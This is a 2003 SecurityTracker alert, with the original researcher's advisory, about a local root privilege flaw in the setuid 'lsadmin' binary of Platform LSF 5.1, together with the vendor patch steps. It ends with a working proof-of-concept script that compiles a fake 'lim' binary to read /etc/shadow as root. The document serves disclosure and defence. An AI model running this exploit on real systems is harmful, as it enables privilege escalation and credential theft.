SecurityTracker.com
Category:   Application (Generic)  >   Platform LSF
Vendors:   Platform Computing Inc.
Platform LSF Privilege Flaw Lets Local Users Execute Arbitrary Code with Root Privileges
SecurityTracker Alert ID:  1006821
SecurityTracker URL:  http://securitytracker.com/id/1006821
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 23 2003
Impact:   Root access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.1
Description:   A vulnerability was reported in Platform Computing's Platform LSF distributed computing software. A local user can gain root privileges.

It is reported that a local user can cause the 'lsadmin' binary to execute arbitrary code. The binary is reportedly configured with set user id (setuid) root privileges, so the arbitrary code will run with root privileges.

A local user can set the LSF_ENVDIR variable to cause 'lsadmin' to use an alternate 'lsf.conf' file. The local user can also set the LSF_SERVERDIR variable in the 'lsf.conf' file to an alternate path containing a malicious 'lim' binary. Then, the 'lsadmin' ckconfig command can be used to invoke the malicious 'lim' code with root privileges.

Some demonstration exploit code is provided in the Source Message.

The following timeline is provided:

Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix: 19 Mar 2003

Impact:   A local user can cause arbitrary code to be executed with root privileges.
Solution:   A patch for 'lsadmin' is available at:

ftp://ftp.platform.com

location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

Download the patch. Then, in the LSF_BINDIR, move the old lsadmin to lsadmin.old. Uncompress and rename the downloaded binary to lsadmin, then move the new lsadmin to LSF_BINDIR. The permissions of the new lsadmin binary should be 4755.

For more information or to obtain a password to download the patch, contact the vendor at support@platform.com.

Vendor URL:  www.platform.com/products/wm/LSF/index.asp
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Security advisory: LSF 5.1 local root exploit



	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root privilege by forcing the 'lsadmin'
	binary to execute code of the attacker's choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command. It uses it to check the
correctness of config files. Right after it starts, it is using the
external 'lim' binary. It is using the LSF_SERVERDIR variable in the lsf.conf
file to obtain a path for the 'lim' binary. A regular user can make his own
lsf.conf file and, by using the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of the default /etc/lsf.conf file. An attacker can therefore point
the LSF_SERVERDIR variable to his own 'lim' binary.  The attacker's 'lim'
binary will be executed with setuid root privileges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
support@platform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support@platform.com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
int main() {
FILE *secret_file;
FILE *temp_file;
char one_line[128];
setuid(0);setgid(0);
secret_file = fopen("/etc/shadow", "r");
temp_file = fopen(".temp.file", "w");
fgets(one_line, 120, secret_file);
fputs(one_line, temp_file);
fclose(secret_file); fclose (temp_file);
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl



 
 



Copyright 2021, SecurityGlobal.net LLC